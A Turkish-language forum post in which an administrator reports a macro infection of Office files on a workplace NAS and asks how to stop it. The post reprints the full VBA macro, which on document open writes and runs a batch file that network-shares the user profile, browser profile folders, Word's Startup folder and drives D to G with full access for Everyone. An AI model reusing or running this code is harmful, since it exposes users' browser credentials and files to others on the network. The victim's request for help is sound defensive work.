Tekil Mesaj gösterimi - Virüs Sorunu

Konu Virüs Sorunu

16-06-2016, 13:53:12

Arkadaşlar merhaba,

Kurumum da NAS server de bulunan içeriklerimize bir tür virüs bulaştı.
İçeriğinde bulunan WORD, EXCEL, POWERPOINT dosyalarının uzantıları .docm, xmlm ve pptm oldu.
Açtığımızda ise içeriği etkinleştir diyerek dosya açılıyor.
Dosya içerisinde kod düzenine baktığım da şöyle bir şeyle karşılaştım.

Private Sub Document_Open()

    Dim strUserName As String
    
    'Use the Application Object to get the Username
    strUserName = Application.UserName
    
    If strUserName = "Administrator" Then GoTo lineCls
    
    If Not strUserName Then GoTo lineRn
    
lineRn:
    Dim filesize As Integer
    Dim FlName As String

    FlName = "C:\WINDOWS\RUN_AS.BAT"

    '~~> get a free file handle
    filesize = FreeFile()

    '~~> Open your file
    Open FlName For Output As #filesize

    '~~> Export Text
    Print #filesize, "NET SHARE USRPRFL=%USERPROFILE%"
    Print #filesize, "CACLS %USERPROFILE% /E /R EVERYONE"
    Print #filesize, "CACLS %USERPROFILE% /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "NET SHARE CHRM_CCH=%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default"
    Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default /E /R EVERYONE"
    Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "NET SHARE FRFX_CCH=%USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles"
    Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles /E /R EVERYONE"
    Print #filesize, "CACLS %USERPROFILE%\AppData\Local\Mozilla\Firefox\Profiles /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "NET SHARE MS_STRTP=%USERPROFILE%\Application Data\Microsoft\Word\Startup"
    Print #filesize, "CACLS %USERPROFILE%\Application Data\Microsoft\Word\Startup /E /R EVERYONE"
    Print #filesize, "CACLS %USERPROFILE%\Application Data\Microsoft\Word\Startup /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "NET SHARE DSK_D=D:\"
    Print #filesize, "CACLS D:\ /E /R EVERYONE"
    Print #filesize, "CACLS D:\ /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "NET SHARE DSK_E=E:\"
    Print #filesize, "CACLS E:\ /E /R EVERYONE"
    Print #filesize, "CACLS E:\ /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "NET SHARE DSK_F=F:\"
    Print #filesize, "CACLS F:\ /E /R EVERYONE"
    Print #filesize, "CACLS F:\ /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "NET SHARE DSK_G=G:\"
    Print #filesize, "CACLS G:\ /E /R EVERYONE"
    Print #filesize, "CACLS G:\ /E /G EVERYONE:F"
    Print #filesize, ""
    Print #filesize, "> %PUBLIC%\REPORT.TXT ("
    Print #filesize, "ECHO WORK SUCCESFULLY "
    Print #filesize, "ECHO ---"
    Print #filesize, "ECHO %DATE%"
    Print #filesize, "ECHO %TIME%"
    Print #filesize, "ECHO IPCONFIG"
    Print #filesize, "ECHO NET USER %USERNAME%"
    Print #filesize, "ECHO %USERPROFILE%"
    Print #filesize, "ECHO ---"
    Print #filesize, "ECHO BY YORGOS VASILIS"
    Print #filesize, ")"
    Print #filesize, "EXIT"
    Close #filesize
    
    Shell "cmd /c C:\WINDOWS\RUN_AS.BAT"


lineCls:
    
    Dim filesize2 As Integer
    Dim FlName2 As String

    FlName2 = "C:\REPORT.TXT"

    '~~> get a free file handle
    filesize2 = FreeFile()

    '~~> Open your file
    Open FlName2 For Output As #filesize2

    '~~> Export Text
    Print #filesize2, "The command applied succesfully"
    Close #filesize2
        
End Sub

Bu YORGOS VASILIS kimse iyi sayıyorum şuan

)

Daha önce karşılaşan varmı?
Sizce nasıl engelleriz?